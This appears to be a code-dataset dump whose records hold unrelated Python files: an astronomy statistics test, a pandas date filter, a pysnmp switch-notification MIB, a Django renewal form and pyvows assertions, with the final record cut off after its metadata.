blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
616
content_id
stringlengths
40
40
detected_licenses
sequencelengths
0
112
license_type
stringclasses
2 values
repo_name
stringlengths
5
115
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
777 values
visit_date
timestamp[us]date
2015-08-06 10:31:46
2023-09-06 10:44:38
revision_date
timestamp[us]date
1970-01-01 02:38:32
2037-05-03 13:00:00
committer_date
timestamp[us]date
1970-01-01 02:38:32
2023-09-06 01:08:06
github_id
int64
4.92k
681M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
22 values
gha_event_created_at
timestamp[us]date
2012-06-04 01:52:49
2023-09-14 21:59:50
gha_created_at
timestamp[us]date
2008-05-22 07:58:19
2023-08-21 12:35:19
gha_language
stringclasses
149 values
src_encoding
stringclasses
26 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
3
10.2M
extension
stringclasses
188 values
content
stringlengths
3
10.2M
authors
sequencelengths
1
1
author_id
stringlengths
1
132
e7289fa1f549284d7e98f8964c2d31047a9bc6da
7c2c36ebf1a28a1b3990578bb59883d0a5fe74e6
/turbustat/tests/test_pdf.py
3ab83d5028113dcd19cf5de8be96265696ed77af
[ "MIT" ]
permissive
hopehhchen/TurbuStat
1ebb6dbdd9e80fcacc0e4ed75359909a1bad8a4d
3793c8b3a6deb4c14b1388b5290a21d93f1697cf
refs/heads/master
2020-07-09T23:58:07.035643
2015-06-08T14:43:38
2015-06-08T14:43:38
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,371
py
# Licensed under an MIT open source license - see LICENSE from unittest import TestCase import numpy as np import numpy.testing as npt from ..statistics.pdf import PDF, PDF_Distance from ._testing_data import \ dataset1, dataset2, computed_data, computed_distances class testPDF(TestCase): def setUp(self): self.dataset1 = dataset1 self.dataset2 = dataset2 def test_PDF_distance(self): self.test_dist = \ PDF_Distance(self.dataset1["integrated_intensity"][0], self.dataset2["integrated_intensity"][0], min_val1=0.05, min_val2=0.05, weights1=self.dataset1["integrated_intensity_error"][0] ** -2., weights2=self.dataset2["integrated_intensity_error"][0] ** -2.) self.test_dist.distance_metric() assert np.allclose(self.test_dist.PDF1.pdf, computed_data["pdf_val"]) npt.assert_almost_equal(self.test_dist.hellinger_distance, computed_distances['pdf_hellinger_distance']) npt.assert_almost_equal(self.test_dist.ks_distance, computed_distances['pdf_ks_distance']) npt.assert_almost_equal(self.test_dist.ad_distance, computed_distances['pdf_ad_distance'])
83ac34c589d3f1a44e27f059c40cebcdad36f63d
b54d6a18bc5e86462c1f085386bc48065db5851c
/targetDF.py
0c442099cfd980035cfa5306b1d087212fa72489
[]
no_license
zoshs2/Percolation_Seoul
5b5b8ebabe186fbc9e265fc190c3d0641e196517
69c0aa99d1f7a2fb9259681a1ed63794cbe5ea5c
refs/heads/main
2023-07-28T20:50:13.393765
2021-09-28T13:25:31
2021-09-28T13:25:31
390,687,544
1
0
null
null
null
null
UTF-8
Python
false
false
1,030
py
import pandas as pd def targetDF(dataset, YEAR, MONTH, DAY, HOUR=False, MINUTE=False) -> pd.DataFrame: ''' Return pd.DataFrame with only data that we concerned. Example ------- In[0] date_dataset = targetDF(dataset, 2021, 2, 1) In[1] date_dataset = extract_ratio_df(date_dataset) # Generate a ratio column In[2] time_dataset = targetDF(date_dataset, 2021, 2, 1, 9, 0) # 2021-02-01 / 09:00 AM In[3] CheckOverRatio(time_dataset) # Check over ratio raws & do the correction by inplacing. ''' if (HOUR is not False) & (MINUTE is not False): vel_target = dataset[(dataset['PRCS_YEAR']==YEAR) & (dataset['PRCS_MON']==MONTH) & (dataset['PRCS_DAY']==DAY) & (dataset['PRCS_HH']==HOUR) & (dataset['PRCS_MIN']==MINUTE)] vel_target = vel_target.reset_index(drop=True) return vel_target vel_target = dataset[(dataset['PRCS_YEAR']==YEAR) & (dataset['PRCS_MON']==MONTH) & (dataset['PRCS_DAY']==DAY)] vel_target = vel_target.reset_index(drop=True) return vel_target
47ea363768f04b52b108cc1522373cc3a8f7d61a
85a9ffeccb64f6159adbd164ff98edf4ac315e33
/pysnmp/BAY-STACK-NOTIFICATIONS-MIB.py
9fe6dd9a7f0564c4dc72d5d5ffd161421012167e
[ "Apache-2.0" ]
permissive
agustinhenze/mibs.snmplabs.com
5d7d5d4da84424c5f5a1ed2752f5043ae00019fb
1fc5c07860542b89212f4c8ab807057d9a9206c7
refs/heads/master
2020-12-26T12:41:41.132395
2019-08-16T15:51:41
2019-08-16T15:53:57
237,512,469
0
0
Apache-2.0
2020-01-31T20:41:36
2020-01-31T20:41:35
null
UTF-8
Python
false
false
19,230
py
# # PySNMP MIB module BAY-STACK-NOTIFICATIONS-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/BAY-STACK-NOTIFICATIONS-MIB # Produced by pysmi-0.3.4 at Mon Apr 29 17:19:14 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ValueSizeConstraint, ValueRangeConstraint, SingleValueConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsUnion", "ConstraintsIntersection") bayStackConfigExpectedStackSize, bayStackUnitConfigIndex = mibBuilder.importSymbols("BAY-STACK-MIB", "bayStackConfigExpectedStackSize", "bayStackUnitConfigIndex") dot1xAuthBackendAuthState, dot1xAuthPaeState = mibBuilder.importSymbols("IEEE8021-PAE-MIB", "dot1xAuthBackendAuthState", "dot1xAuthPaeState") ifIndex, ifAdminStatus, InterfaceIndex = mibBuilder.importSymbols("IF-MIB", "ifIndex", "ifAdminStatus", "InterfaceIndex") InetAddress, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddress", "InetAddressType") s5AgSysUsbTargetUnit, s5AgentScriptStatus = mibBuilder.importSymbols("S5-AGENT-MIB", "s5AgSysUsbTargetUnit", "s5AgentScriptStatus") s5ChasComType, = mibBuilder.importSymbols("S5-CHASSIS-MIB", "s5ChasComType") SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString") NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance") ObjectIdentity, MibIdentifier, Bits, iso, Counter32, Gauge32, IpAddress, ModuleIdentity, NotificationType, Unsigned32, Counter64, Integer32, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "MibIdentifier", "Bits", "iso", "Counter32", "Gauge32", "IpAddress", "ModuleIdentity", "NotificationType", "Unsigned32", "Counter64", "Integer32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks") MacAddress, TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "MacAddress", "TextualConvention", "DisplayString") bayStackMibs, = mibBuilder.importSymbols("SYNOPTICS-ROOT-MIB", "bayStackMibs") bayStackNotificationsMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 45, 5, 2)) bayStackNotificationsMib.setRevisions(('2014-07-07 00:00', '2014-01-27 00:00', '2013-10-11 00:00', '2013-08-22 00:00', '2013-03-19 00:00', '2012-09-04 00:00', '2012-08-22 00:00', '2012-08-16 00:00', '2012-06-21 00:00', '2012-06-20 00:00', '2011-11-30 00:00', '2010-12-21 00:00', '2009-09-28 00:00', '2008-07-09 00:00', '2008-03-31 00:00', '2007-03-05 00:00', '2006-04-06 00:00', '2006-04-04 00:00', '2005-08-22 00:00', '2005-06-30 00:00', '2005-03-26 00:00', '2004-08-06 00:00', '2004-08-02 00:00', '2004-07-20 00:00', '2003-03-16 00:00',)) if mibBuilder.loadTexts: bayStackNotificationsMib.setLastUpdated('201407070000Z') if mibBuilder.loadTexts: bayStackNotificationsMib.setOrganization('Avaya') bsnObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 5, 2, 1)) bsnNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 5, 2, 2)) bsnNotifications0 = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0)) bsnEapAccessViolationMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 1), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEapAccessViolationMacAddress.setStatus('current') bsnLoginFailureType = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("telnet", 1), ("ssh", 2), ("web", 3), ("serialConsole", 4)))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnLoginFailureType.setStatus('current') bsnLoginFailureAddressType = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 3), InetAddressType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnLoginFailureAddressType.setStatus('current') bsnLoginFailureAddress = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 4), InetAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnLoginFailureAddress.setStatus('current') bsnLoginFailureUsername = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 5), SnmpAdminString()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnLoginFailureUsername.setStatus('current') bsnActualStackSize = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 8))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnActualStackSize.setStatus('current') bsnEapUbpFailureIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 7), InterfaceIndex()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEapUbpFailureIfIndex.setStatus('current') bsnEapUbpFailureMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 8), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEapUbpFailureMacAddress.setStatus('current') bsnEapUbpFailureRoleString = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 9), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEapUbpFailureRoleString.setStatus('current') bsnTrialLicenseExpirationTime = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 30))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnTrialLicenseExpirationTime.setStatus('current') bsnTrialLicenseExpirationNumber = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 10))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnTrialLicenseExpirationNumber.setStatus('current') bsnEnteredForcedStackModeMAC = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 12), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEnteredForcedStackModeMAC.setStatus('current') bsnEapRAVErrorMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 13), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEapRAVErrorMacAddress.setStatus('current') bsnEapRAVErrorPort = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 14), InterfaceIndex()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEapRAVErrorPort.setStatus('current') bsnEnteredForcedStackModeAddressType = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 15), InetAddressType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEnteredForcedStackModeAddressType.setStatus('current') bsnEnteredForcedStackModeAddress = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 16), InetAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEnteredForcedStackModeAddress.setStatus('current') bsnStackProtectionEvent = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 17), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("cannotJoinStack", 1), ("unitIgnored", 2)))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnStackProtectionEvent.setStatus('current') bsnUSBInfo = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 18), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnUSBInfo.setStatus('current') bsnSFPInfo = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 19), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnSFPInfo.setStatus('current') bsnAaaUserName = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 20), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(10, 16))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnAaaUserName.setStatus('current') bsnConfigurationSavedToNvram = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 1)) if mibBuilder.loadTexts: bsnConfigurationSavedToNvram.setStatus('current') bsnEapAccessViolation = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 2)).setObjects(("IEEE8021-PAE-MIB", "dot1xAuthPaeState"), ("IEEE8021-PAE-MIB", "dot1xAuthBackendAuthState"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnEapAccessViolationMacAddress")) if mibBuilder.loadTexts: bsnEapAccessViolation.setStatus('current') bsnPortSpeedDuplexMismatch = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 3)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnPortSpeedDuplexMismatch.setStatus('current') bsnStackManagerReconfiguration = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 4)) if mibBuilder.loadTexts: bsnStackManagerReconfiguration.setStatus('current') bsnLacTrunkUnavailable = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 5)) if mibBuilder.loadTexts: bsnLacTrunkUnavailable.setStatus('current') bsnLoginFailure = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 6)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnLoginFailureType"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnLoginFailureAddressType"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnLoginFailureAddress"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnLoginFailureUsername")) if mibBuilder.loadTexts: bsnLoginFailure.setStatus('current') bsnMLTHealthFailure = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 7)).setObjects(("IF-MIB", "ifAdminStatus")) if mibBuilder.loadTexts: bsnMLTHealthFailure.setStatus('current') bsnTrunkPortDisabledToPreventBroadcastStorm = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 8)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnTrunkPortDisabledToPreventBroadcastStorm.setStatus('current') bsnLacPortDisabledToPreventBroadcastStorm = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 9)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnLacPortDisabledToPreventBroadcastStorm.setStatus('current') bsnTrunkPortEnabledToPreventBroadcastStorm = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 10)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnTrunkPortEnabledToPreventBroadcastStorm.setStatus('current') bsnLacPortDisabledDueToLossOfVLACPDU = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 11)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnLacPortDisabledDueToLossOfVLACPDU.setStatus('current') bsnLacPortEnabledDueToReceiptOfVLACPDU = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 12)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnLacPortEnabledDueToReceiptOfVLACPDU.setStatus('current') bsnStackConfigurationError = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 13)).setObjects(("BAY-STACK-MIB", "bayStackConfigExpectedStackSize"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnActualStackSize")) if mibBuilder.loadTexts: bsnStackConfigurationError.setStatus('current') bsnEapUbpFailure = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 14)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnEapUbpFailureIfIndex"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnEapUbpFailureMacAddress"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnEapUbpFailureRoleString")) if mibBuilder.loadTexts: bsnEapUbpFailure.setStatus('current') bsnTrialLicenseExpiration = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 15)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnTrialLicenseExpirationTime"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnTrialLicenseExpirationNumber")) if mibBuilder.loadTexts: bsnTrialLicenseExpiration.setStatus('current') bsnEnteredForcedStackMode = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 16)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnEnteredForcedStackModeMAC"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnEnteredForcedStackModeAddressType"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnEnteredForcedStackModeAddress")) if mibBuilder.loadTexts: bsnEnteredForcedStackMode.setStatus('current') bsnTemperatureExceeded = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 17)).setObjects(("S5-CHASSIS-MIB", "s5ChasComType")) if mibBuilder.loadTexts: bsnTemperatureExceeded.setStatus('current') bsnEapRAVError = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 18)).setObjects(("IEEE8021-PAE-MIB", "dot1xAuthPaeState"), ("IEEE8021-PAE-MIB", "dot1xAuthBackendAuthState"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnEapRAVErrorMacAddress"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnEapRAVErrorPort")) if mibBuilder.loadTexts: bsnEapRAVError.setStatus('current') bsnEapRateLimitExceeded = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 19)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnEapRateLimitExceeded.setStatus('current') bsnSystemUp365Days = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 20)).setObjects(("BAY-STACK-MIB", "bayStackUnitConfigIndex")) if mibBuilder.loadTexts: bsnSystemUp365Days.setStatus('current') bsnUSBInsertion = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 21)).setObjects(("S5-AGENT-MIB", "s5AgSysUsbTargetUnit"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnUSBInfo")) if mibBuilder.loadTexts: bsnUSBInsertion.setStatus('current') bsnUSBRemoval = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 22)).setObjects(("S5-AGENT-MIB", "s5AgSysUsbTargetUnit")) if mibBuilder.loadTexts: bsnUSBRemoval.setStatus('current') bsnSFPInsertion = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 23)).setObjects(("IF-MIB", "ifIndex"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnSFPInfo")) if mibBuilder.loadTexts: bsnSFPInsertion.setStatus('current') bsnSFPRemoval = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 24)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnSFPRemoval.setStatus('current') bsnROPasswordExpired = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 25)) if mibBuilder.loadTexts: bsnROPasswordExpired.setStatus('current') bsnRWPasswordExpired = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 26)) if mibBuilder.loadTexts: bsnRWPasswordExpired.setStatus('current') bsnStackProtection = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 27)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnStackProtectionEvent")) if mibBuilder.loadTexts: bsnStackProtection.setStatus('current') bsnRunScripts = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 28)).setObjects(("S5-AGENT-MIB", "s5AgentScriptStatus")) if mibBuilder.loadTexts: bsnRunScripts.setStatus('current') bsnAaaUserAccountNotUsed = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 29)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnAaaUserName")) if mibBuilder.loadTexts: bsnAaaUserAccountNotUsed.setStatus('current') bsnAaaAlreadyConnected = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 30)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnAaaUserName")) if mibBuilder.loadTexts: bsnAaaAlreadyConnected.setStatus('current') bsnAaaIncorrectLogOnThresholdExceeded = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 31)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnAaaUserName")) if mibBuilder.loadTexts: bsnAaaIncorrectLogOnThresholdExceeded.setStatus('current') bsnAaaMaxNoOfSessionsExceeded = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 32)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnAaaUserName")) if mibBuilder.loadTexts: bsnAaaMaxNoOfSessionsExceeded.setStatus('current') bsnAuditUnsentMessages = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 33)) if mibBuilder.loadTexts: bsnAuditUnsentMessages.setStatus('current') bsnAuditRecordEventsFailure = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 34)) if mibBuilder.loadTexts: bsnAuditRecordEventsFailure.setStatus('current') bsnAuditStartUpTrap = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 35)) if mibBuilder.loadTexts: bsnAuditStartUpTrap.setStatus('current') bsnAuditShutDownTrap = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 36)) if mibBuilder.loadTexts: bsnAuditShutDownTrap.setStatus('current') bsnAaaUserPasswordExpired = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 37)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnAaaUserName")) if mibBuilder.loadTexts: bsnAaaUserPasswordExpired.setStatus('current') mibBuilder.exportSymbols("BAY-STACK-NOTIFICATIONS-MIB", bsnActualStackSize=bsnActualStackSize, bsnSFPInsertion=bsnSFPInsertion, bsnLacPortDisabledToPreventBroadcastStorm=bsnLacPortDisabledToPreventBroadcastStorm, bsnLoginFailureUsername=bsnLoginFailureUsername, bsnROPasswordExpired=bsnROPasswordExpired, bsnEapAccessViolationMacAddress=bsnEapAccessViolationMacAddress, bsnAaaMaxNoOfSessionsExceeded=bsnAaaMaxNoOfSessionsExceeded, bsnAuditStartUpTrap=bsnAuditStartUpTrap, bsnStackManagerReconfiguration=bsnStackManagerReconfiguration, bsnAuditShutDownTrap=bsnAuditShutDownTrap, bsnEnteredForcedStackModeMAC=bsnEnteredForcedStackModeMAC, bsnTrialLicenseExpirationNumber=bsnTrialLicenseExpirationNumber, bsnEapRAVErrorPort=bsnEapRAVErrorPort, bsnEnteredForcedStackModeAddress=bsnEnteredForcedStackModeAddress, bsnConfigurationSavedToNvram=bsnConfigurationSavedToNvram, bsnObjects=bsnObjects, bsnUSBRemoval=bsnUSBRemoval, bsnTrialLicenseExpirationTime=bsnTrialLicenseExpirationTime, bsnMLTHealthFailure=bsnMLTHealthFailure, bsnUSBInsertion=bsnUSBInsertion, bsnLacPortDisabledDueToLossOfVLACPDU=bsnLacPortDisabledDueToLossOfVLACPDU, bayStackNotificationsMib=bayStackNotificationsMib, bsnLacTrunkUnavailable=bsnLacTrunkUnavailable, bsnEapRateLimitExceeded=bsnEapRateLimitExceeded, bsnEnteredForcedStackModeAddressType=bsnEnteredForcedStackModeAddressType, bsnStackConfigurationError=bsnStackConfigurationError, bsnLoginFailureType=bsnLoginFailureType, bsnTemperatureExceeded=bsnTemperatureExceeded, bsnEapUbpFailureRoleString=bsnEapUbpFailureRoleString, bsnSystemUp365Days=bsnSystemUp365Days, bsnAaaAlreadyConnected=bsnAaaAlreadyConnected, bsnEapUbpFailureMacAddress=bsnEapUbpFailureMacAddress, bsnAaaIncorrectLogOnThresholdExceeded=bsnAaaIncorrectLogOnThresholdExceeded, bsnEapRAVError=bsnEapRAVError, bsnAuditRecordEventsFailure=bsnAuditRecordEventsFailure, bsnEapUbpFailure=bsnEapUbpFailure, bsnRunScripts=bsnRunScripts, bsnStackProtectionEvent=bsnStackProtectionEvent, bsnAaaUserPasswordExpired=bsnAaaUserPasswordExpired, bsnNotifications0=bsnNotifications0, bsnLoginFailureAddress=bsnLoginFailureAddress, bsnEnteredForcedStackMode=bsnEnteredForcedStackMode, bsnStackProtection=bsnStackProtection, bsnAuditUnsentMessages=bsnAuditUnsentMessages, bsnNotifications=bsnNotifications, bsnLacPortEnabledDueToReceiptOfVLACPDU=bsnLacPortEnabledDueToReceiptOfVLACPDU, bsnSFPInfo=bsnSFPInfo, bsnLoginFailure=bsnLoginFailure, bsnTrialLicenseExpiration=bsnTrialLicenseExpiration, bsnEapAccessViolation=bsnEapAccessViolation, bsnRWPasswordExpired=bsnRWPasswordExpired, bsnEapUbpFailureIfIndex=bsnEapUbpFailureIfIndex, bsnTrunkPortEnabledToPreventBroadcastStorm=bsnTrunkPortEnabledToPreventBroadcastStorm, bsnPortSpeedDuplexMismatch=bsnPortSpeedDuplexMismatch, bsnEapRAVErrorMacAddress=bsnEapRAVErrorMacAddress, PYSNMP_MODULE_ID=bayStackNotificationsMib, bsnTrunkPortDisabledToPreventBroadcastStorm=bsnTrunkPortDisabledToPreventBroadcastStorm, bsnAaaUserName=bsnAaaUserName, bsnLoginFailureAddressType=bsnLoginFailureAddressType, bsnAaaUserAccountNotUsed=bsnAaaUserAccountNotUsed, bsnUSBInfo=bsnUSBInfo, bsnSFPRemoval=bsnSFPRemoval)
e3af53fba43b0b71ce8efca13bf2a89e6455544d
cea45595be3e9ff0daa09b4443c7220368e5c512
/catalog/forms.py
d17b59b3d29f1d2a4beed6697d06d27d5e996bb9
[]
no_license
VladyslavHnatchenko/mdn
7b65ecf2e73eff2533aae4ffe5ad6a5a928750d9
f74736aeaf8c4b8ca51889c1a00571cb07f6dba2
refs/heads/master
2020-04-18T02:16:08.622726
2019-02-15T13:37:49
2019-02-15T13:37:49
167,149,898
0
0
null
null
null
null
UTF-8
Python
false
false
919
py
import datetime from django import forms from django.core.exceptions import ValidationError from django.utils.translation import ugettext_lazy as _ class RenewBookForm(forms.Form): renewal_date = forms.DateField(help_text="Enter a date between now and" " 4 weeks (default 3).") def clean_renewal_date(self): data = self.cleaned_data['renewal_date'] # Check if a date is not in the past. if data < datetime.date.today(): raise ValidationError(_('Invalid date - renewal in past')) # Check if a date is in the allowed range (+4 weeks from today). if data > datetime.date.today() + datetime.timedelta(weeks=4): raise ValidationError(_('Invalid date - renewal more than 4 weeks ' 'ahead')) # Remember to always return the cleaned data. return data
3170c04749e484a7ed6bc52dc2aac6b927bdd8f1
29790e8faa702dc52ff2ebf905d15ff8c6cfcda9
/pyvows/assertions/inclusion.py
fc1d51ea05f322686a78849c17c541a6ad3d37a1
[]
no_license
scraping-xx/pyvows
0227a2b3f16bcf562acb48902ed3c58d6e616791
b03e9bed37b93f24eca1dd910c05e78e81969ca2
refs/heads/master
2020-12-01T01:15:09.487368
2011-08-16T03:36:57
2011-08-16T03:36:57
null
0
0
null
null
null
null
UTF-8
Python
false
false
633
py
#!/usr/bin/env python # -*- coding: utf-8 -*- # pyVows testing engine # https://github.com/heynemann/pyvows # Licensed under the MIT license: # http://www.opensource.org/licenses/mit-license # Copyright (c) 2011 Bernardo Heynemann [email protected] from pyvows import Vows @Vows.assertion def to_include(topic, expected): message = "Expected topic(%s) to include %s, but it didn't" % (topic, expected) assert expected in topic, message @Vows.assertion def not_to_include(topic, expected): message = "Expected topic(%s) not to include %s, but it did" % (topic, expected) assert expected not in topic, message
371e2253a9dfed238c59e6c0d05d3ff759ba2f77
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
/cases/synthetic/coverage-big-1134.py
ddbf3edc9d3761abdb1aadc07c33a7eef98fd2b1
